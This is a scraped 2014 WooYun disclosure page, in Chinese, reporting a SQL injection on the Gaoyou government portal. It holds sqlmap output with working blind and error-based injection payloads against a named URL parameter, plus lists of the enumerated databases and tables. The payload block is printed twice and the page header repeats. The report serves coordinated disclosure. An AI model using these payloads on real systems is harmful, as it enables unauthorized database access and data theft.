高邮政府门户网站又一个SQL注射 | wooyun-2014-050794| WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2014-050794

漏洞标题：高邮政府门户网站又一个SQL注射

漏洞作者： lxj616

提交时间：2014-02-13 15:46

修复时间：2014-03-30 15:47

公开时间：2014-03-30 15:47

漏洞类型：SQL注射漏洞

危害等级：中

自评Rank：6

漏洞状态：已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2014-02-13：细节已通知厂商并且等待厂商处理中
2014-02-18：厂商已经确认，细节仅向厂商公开
2014-02-28：细节向核心白帽子及相关领域专家公开
2014-03-10：细节向普通白帽子公开
2014-03-20：细节向实习白帽子公开
2014-03-30：细节向公众公开

简要描述：

之前有过一个了，发现只有那个文件被补上了，指哪补哪的节奏，换个文件继续注射，跑表走人

详细说明：

http://www.gaoyou.gov.cn/gzcy/gzcy_bmxx_submit.php?depart_bianhao=15&depart_name=%B0%B2%BC%E0%BE%D6

sqlmap identified the following injection points with a total of 16 HTTP(s) requests:
---
Place: GET
Parameter: depart_bianhao
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: depart_bianhao=15' AND 5972=5972 AND 'EWEV'='EWEV&depart_name=%B0%B2%BC%E0%BE%D6
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: depart_bianhao=15' AND (SELECT 3893 FROM(SELECT COUNT(*),CONCAT(0x716d777771,(SELECT (CASE WHEN (3893=3893) THEN 1 ELSE 0 END)),0x71786e6e71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'rtFs'='rtFs&depart_name=%B0%B2%BC%E0%BE%D6
---
web application technology: Apache, PHP 5.4.7
back-end DBMS: MySQL 5.0
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: depart_bianhao
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: depart_bianhao=15' AND 5972=5972 AND 'EWEV'='EWEV&depart_name=%B0%B2%BC%E0%BE%D6
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: depart_bianhao=15' AND (SELECT 3893 FROM(SELECT COUNT(*),CONCAT(0x716d777771,(SELECT (CASE WHEN (3893=3893) THEN 1 ELSE 0 END)),0x71786e6e71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'rtFs'='rtFs&depart_name=%B0%B2%BC%E0%BE%D6
---
web application technology: Apache, PHP 5.4.7
back-end DBMS: MySQL 5.0
Database: cdcol
[1 table]
+---------------------------------------+
| cds                                   |
+---------------------------------------+
Database: gy
[81 tables]
+---------------------------------------+
| accessory                             |
| ad                                    |
| ad_all                                |
| addgroup                              |
| bbcode                                |
| cdb_access                            |
| cdb_activities                        |
| cdb_activityapplies                   |
| cdb_adminactions                      |
| cdb_admincustom                       |
| cdb_admingroups                       |
| cdb_adminnotes                        |
| cdb_adminsessions                     |
| cdb_advcaches                         |
| cdb_advertisements                    |
| cdb_announcements                     |
| cdb_attachments                       |
| cdb_attachpaymentlog                  |
| cdb_attachtypes                       |
| cdb_banned                            |
| cdb_bbcodes                           |
| cdb_buddys                            |
| cdb_caches                            |
| cdb_campaigns                         |
| cdb_creditslog                        |
| cdb_crons                             |
| cdb_debateposts                       |
| cdb_debates                           |
| cdb_failedlogins                      |
| cdb_faqs                              |
| cdb_favorites                         |
| cdb_forumfields                       |
| cdb_forumlinks                        |
| cdb_forumrecommend                    |
| cdb_forums                            |
| cdb_imagetypes                        |
| cdb_invites                           |
| cdb_itempool                          |
| cdb_magiclog                          |
| cdb_magicmarket                       |
| cdb_magics                            |
| cdb_medallog                          |
| cdb_medals                            |
| cdb_memberfields                      |
| cdb_membermagics                      |
| cdb_members                           |
| chat_bg                               |
| chat_stat                             |
| chat_zhyao                            |
| chatinfo2                             |
| chatinfo23                            |
| chatmain                              |
| chatroom                              |
| chatroom_dbzx                         |
| chatroom_hfrx                         |
| chatroom_view                         |
| chattype                              |
| chatuser                              |
| choicetime                            |
| db_access                             |
| db_admingroups                        |
| db_adminsessions                      |
| db_announcements                      |
| db_attachments                        |
| db_attachtypes                        |
| db_banned                             |
| db_bbcodes                            |
| db_buddys                             |
| db_bzsm                               |
| db_caches                             |
| db_failedlogins                       |
| db_favorites                          |
| db_forumlinks                         |
| db_forums                             |
| db_gkml                               |
| db_gkzn                               |
| db_karmalog                           |
| db_members                            |
| db_onlinelist                         |
| db_plugins                            |
| db_plugins_settings                   |
+---------------------------------------+
Database: information_schema
[37 tables]
+---------------------------------------+
| CHARACTER_SETS                        |
| COLLATIONS                            |
| COLLATION_CHARACTER_SET_APPLICABILITY |
| COLUMNS                               |
| COLUMN_PRIVILEGES                     |
| ENGINES                               |
| EVENTS                                |
| FILES                                 |
| GLOBAL_STATUS                         |
| GLOBAL_VARIABLES                      |
| INNODB_CMP                            |
| INNODB_CMPMEM                         |
| INNODB_CMPMEM_RESET                   |
| INNODB_CMP_RESET                      |
| INNODB_LOCKS                          |
| INNODB_LOCK_WAITS                     |
| INNODB_TRX                            |
| KEY_COLUMN_USAGE                      |
| PARAMETERS                            |
| PARTITIONS                            |
| PLUGINS                               |
| PROCESSLIST                           |
| PROFILING                             |
| REFERENTIAL_CONSTRAINTS               |
| ROUTINES                              |
| SCHEMATA                              |
| SCHEMA_PRIVILEGES                     |
| SESSION_STATUS                        |
| SESSION_VARIABLES                     |
| STATISTICS                            |
| TABLES                                |
| TABLESPACES                           |
| TABLE_CONSTRAINTS                     |
| TABLE_PRIVILEGES                      |
| TRIGGERS                              |
| USER_PRIVILEGES                       |
| VIEWS                                 |
+---------------------------------------+

漏洞证明：

sqlmap identified the following injection points with a total of 16 HTTP(s) requests:
---
Place: GET
Parameter: depart_bianhao
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: depart_bianhao=15' AND 5972=5972 AND 'EWEV'='EWEV&depart_name=%B0%B2%BC%E0%BE%D6
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: depart_bianhao=15' AND (SELECT 3893 FROM(SELECT COUNT(*),CONCAT(0x716d777771,(SELECT (CASE WHEN (3893=3893) THEN 1 ELSE 0 END)),0x71786e6e71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'rtFs'='rtFs&depart_name=%B0%B2%BC%E0%BE%D6
---
web application technology: Apache, PHP 5.4.7
back-end DBMS: MySQL 5.0
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: depart_bianhao
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: depart_bianhao=15' AND 5972=5972 AND 'EWEV'='EWEV&depart_name=%B0%B2%BC%E0%BE%D6
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: depart_bianhao=15' AND (SELECT 3893 FROM(SELECT COUNT(*),CONCAT(0x716d777771,(SELECT (CASE WHEN (3893=3893) THEN 1 ELSE 0 END)),0x71786e6e71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'rtFs'='rtFs&depart_name=%B0%B2%BC%E0%BE%D6
---
web application technology: Apache, PHP 5.4.7
back-end DBMS: MySQL 5.0
Database: cdcol
[1 table]
+---------------------------------------+
| cds                                   |
+---------------------------------------+
Database: gy
[81 tables]
+---------------------------------------+
| accessory                             |
| ad                                    |
| ad_all                                |
| addgroup                              |
| bbcode                                |
| cdb_access                            |
| cdb_activities                        |
| cdb_activityapplies                   |
| cdb_adminactions                      |
| cdb_admincustom                       |
| cdb_admingroups                       |
| cdb_adminnotes                        |
| cdb_adminsessions                     |
| cdb_advcaches                         |
| cdb_advertisements                    |
| cdb_announcements                     |
| cdb_attachments                       |
| cdb_attachpaymentlog                  |
| cdb_attachtypes                       |
| cdb_banned                            |
| cdb_bbcodes                           |
| cdb_buddys                            |
| cdb_caches                            |
| cdb_campaigns                         |
| cdb_creditslog                        |
| cdb_crons                             |
| cdb_debateposts                       |
| cdb_debates                           |
| cdb_failedlogins                      |
| cdb_faqs                              |
| cdb_favorites                         |
| cdb_forumfields                       |
| cdb_forumlinks                        |
| cdb_forumrecommend                    |
| cdb_forums                            |
| cdb_imagetypes                        |
| cdb_invites                           |
| cdb_itempool                          |
| cdb_magiclog                          |
| cdb_magicmarket                       |
| cdb_magics                            |
| cdb_medallog                          |
| cdb_medals                            |
| cdb_memberfields                      |
| cdb_membermagics                      |
| cdb_members                           |
| chat_bg                               |
| chat_stat                             |
| chat_zhyao                            |
| chatinfo2                             |
| chatinfo23                            |
| chatmain                              |
| chatroom                              |
| chatroom_dbzx                         |
| chatroom_hfrx                         |
| chatroom_view                         |
| chattype                              |
| chatuser                              |
| choicetime                            |
| db_access                             |
| db_admingroups                        |
| db_adminsessions                      |
| db_announcements                      |
| db_attachments                        |
| db_attachtypes                        |
| db_banned                             |
| db_bbcodes                            |
| db_buddys                             |
| db_bzsm                               |
| db_caches                             |
| db_failedlogins                       |
| db_favorites                          |
| db_forumlinks                         |
| db_forums                             |
| db_gkml                               |
| db_gkzn                               |
| db_karmalog                           |
| db_members                            |
| db_onlinelist                         |
| db_plugins                            |
| db_plugins_settings                   |
+---------------------------------------+
Database: information_schema
[37 tables]
+---------------------------------------+
| CHARACTER_SETS                        |
| COLLATIONS                            |
| COLLATION_CHARACTER_SET_APPLICABILITY |
| COLUMNS                               |
| COLUMN_PRIVILEGES                     |
| ENGINES                               |
| EVENTS                                |
| FILES                                 |
| GLOBAL_STATUS                         |
| GLOBAL_VARIABLES                      |
| INNODB_CMP                            |
| INNODB_CMPMEM                         |
| INNODB_CMPMEM_RESET                   |
| INNODB_CMP_RESET                      |
| INNODB_LOCKS                          |
| INNODB_LOCK_WAITS                     |
| INNODB_TRX                            |
| KEY_COLUMN_USAGE                      |
| PARAMETERS                            |
| PARTITIONS                            |
| PLUGINS                               |
| PROCESSLIST                           |
| PROFILING                             |
| REFERENTIAL_CONSTRAINTS               |
| ROUTINES                              |
| SCHEMATA                              |
| SCHEMA_PRIVILEGES                     |
| SESSION_STATUS                        |
| SESSION_VARIABLES                     |
| STATISTICS                            |
| TABLES                                |
| TABLESPACES                           |
| TABLE_CONSTRAINTS                     |
| TABLE_PRIVILEGES                      |
| TRIGGERS                              |
| USER_PRIVILEGES                       |
| VIEWS                                 |
+---------------------------------------+

修复方案：

和去年9月份一样修补，然后过几个月又会有漏洞报告

版权声明：转载请注明来源 lxj616@乌云

漏洞回应

厂商回应：

危害等级：中

漏洞Rank：10

确认时间：2014-02-18 10:09

厂商回复：

已经与此前的漏洞一并转由CNCERT下发给江苏分中心处置。

WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2014-050794

漏洞标题：高邮政府门户网站又一个SQL注射

相关厂商：高邮政府门户

漏洞作者： lxj616

提交时间：2014-02-13 15:46

修复时间：2014-03-30 15:47

公开时间：2014-03-30 15:47

漏洞类型：SQL注射漏洞

危害等级：中

自评Rank：6

漏洞状态：已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 lxj616@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2014-050794

漏洞标题：高邮政府门户网站 又一个SQL注射

相关厂商：高邮政府门户

漏洞作者： lxj616

提交时间：2014-02-13 15:46

修复时间：2014-03-30 15:47

公开时间：2014-03-30 15:47

漏洞类型：SQL注射漏洞

危害等级：中

自评Rank：6

漏洞状态：已交由第三方合作机构(cncert国家互联网应急中心)处理

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2014-050794"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 lxj616@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞概要关注数(24) 关注此漏洞

漏洞标题：高邮政府门户网站又一个SQL注射

Tags标签：无

4人收藏收藏
分享漏洞：